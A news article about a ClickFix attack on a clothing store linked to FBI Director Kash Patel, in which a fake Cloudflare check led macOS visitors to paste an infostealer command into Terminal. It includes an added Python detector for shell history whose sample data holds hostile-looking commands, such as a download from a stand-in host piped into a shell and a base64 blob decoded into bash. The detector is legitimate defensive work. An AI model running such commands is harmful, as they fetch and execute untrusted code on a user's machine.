FBI Chief Kash Patel’s Clothing Store Targeted in ClickFix Infostealer Breach

An online clothing store affiliated with FBI Director Kash Patel was taken offline on Friday after it was found to be spreading infostealer malware to its visitors. The site, known as Based Apparel, had been compromised by hackers who targeted macOS users, tricking them into downloading malicious software designed to steal sensitive information.

Understanding the ClickFix Attack

The attack was executed using a method termed a ClickFix attack. When users accessed BasedApparel.com, they were confronted with a counterfeit warning page that mimicked the interface of Cloudflare, a recognized internet security provider known for its anti-bot verification systems. This imitation page falsely claimed that unusual web traffic had been detected and prompted users to complete a CAPTCHA verification test.

To mislead visitors, the fraudulent page gave unusual instructions directing users to open Terminal, the built-in macOS utility for running system commands. The page provided a button labeled “Copy,” suggesting it would copy a short message confirming that the user was not a robot. In reality, the button placed a lengthy, obfuscated string of code on the clipboard. Users were then told to paste the copied text into Terminal; when executed, it launched a shell script that connected to the hackers’ command and control (C2) servers. This malicious script was engineered to extract cryptocurrency assets from digital wallets and steal session tokens and browser data.
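Because a ClickFix lure depends on the victim pasting the command into Terminal, the command ends up in the shell history file, which gives a responder a concrete place to look after the fact. The following is an added defender-side example, not code from the article or from the affected site: it scans shell history lines (a constructed sample is embedded) for the shapes the article describes, a download piped straight into a shell, a base64 blob decoded into a shell or eval, and an unusually long one-liner carrying a base64-looking token. The indicator patterns and the `example.invalid` host are assumptions for illustration; the real payload string is not reproduced on the page.

```python
"""Scan a macOS shell history for ClickFix-style pasted commands.

Added example (not from the article). The indicator rules below are an
assumption based on the article's description of the lure, not the
actual payload; tune them to what your environment considers normal.
"""
import re
from pathlib import Path

# Rule 1: something fetched from the network and handed straight to a shell.
DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")
# Rule 2a: a base64 blob decoded and piped into a shell.
BASE64_TO_SHELL = re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")
# Rule 2b: a base64 blob decoded inside an eval.
EVAL_BASE64 = re.compile(r'eval\s+"?\$\(.*base64')
# Rule 3: a long base64-looking token (obfuscated one-liner pasted whole).
LONG_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")
# zsh EXTENDED_HISTORY lines look like ": 1700000000:0;command".
ZSH_EXT_PREFIX = re.compile(r"^: \d+:\d+;")


def normalise(line):
    """Strip the zsh extended-history prefix and the trailing newline."""
    return ZSH_EXT_PREFIX.sub("", line.rstrip("\n"))


def classify(cmd):
    """Return the indicator names that fire on a single command string."""
    hits = []
    if DOWNLOAD_TO_SHELL.search(cmd):
        hits.append("download-piped-to-shell")
    if BASE64_TO_SHELL.search(cmd) or EVAL_BASE64.search(cmd):
        hits.append("base64-decoded-to-shell")
    if len(cmd) > 300 and LONG_B64_TOKEN.search(cmd):
        hits.append("long-obfuscated-one-liner")
    return hits


def scan_history(lines):
    """Return [(line_number, command, hits)] for every line that fires a rule."""
    findings = []
    for n, raw in enumerate(lines, 1):
        cmd = normalise(raw)
        hits = classify(cmd)
        if hits:
            findings.append((n, cmd, hits))
    return findings


def scan_history_file(path):
    """Convenience wrapper for a real ~/.zsh_history or ~/.bash_history."""
    text = Path(path).expanduser().read_text(errors="replace")
    return scan_history(text.splitlines(True))


# Constructed sample history: four benign lines plus two that mimic the
# pasted lure (the base64 content is just a repeated filler token).
SAMPLE_HISTORY = [
    ": 1700000000:0;ls -la\n",
    ": 1700000010:0;git status\n",
    ": 1700000020:0;echo 'I am not a robot'\n",
    ": 1700000030:0;echo " + "QUJD" * 80 + " | base64 -d | bash\n",
    ": 1700000040:0;curl -fsSL http://example.invalid/x.sh | sh\n",
    "brew update\n",
]

if __name__ == "__main__":
    for n, cmd, hits in scan_history(SAMPLE_HISTORY):
        print(f"line {n}: {', '.join(hits)}\n    {cmd[:80]}...")
```

Run it against a real history with `scan_history_file("~/.zsh_history")`; a hit is a reason to treat the machine as compromised and rotate any browser sessions and wallet credentials that were present on it, since the article's description says those were the payload's targets.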

Illustration of the ClickFix attack targeting the clothing store.

Incident Discovery and Website Status

The cyberattack was initially recognized by a user in Portugal, who first reported it on Thursday. Cybersecurity researchers later successfully replicated the attack on a MacBook while browsing the site using Chrome. By Friday, BasedApparel.com was entirely offline, replaced by a message indicating that the service would soon resume operations.

While the extent of data loss among visitors remains uncertain, traffic records from Ahrefs indicated that the store, co-founded by Kash Patel and Andrew Ollis prior to Patel’s appointment as FBI Director, garners approximately 33,600 monthly visits. As of this writing, the website had been reestablished but displayed a single-page message stating: “We’ll Be Right Back. We’re making improvements to better serve you. The store will be back online shortly – bolder than ever. Back Soon, Stay Based.”

Current status of the website.

This is not the first time Kash Patel has figured in a cybersecurity incident. Last month, the Handala hacker group, linked to Iran, compromised Patel’s personal Gmail account, leaking private photos and documents. Anyone who visited the compromised site should scan their device thoroughly for infostealer malware.
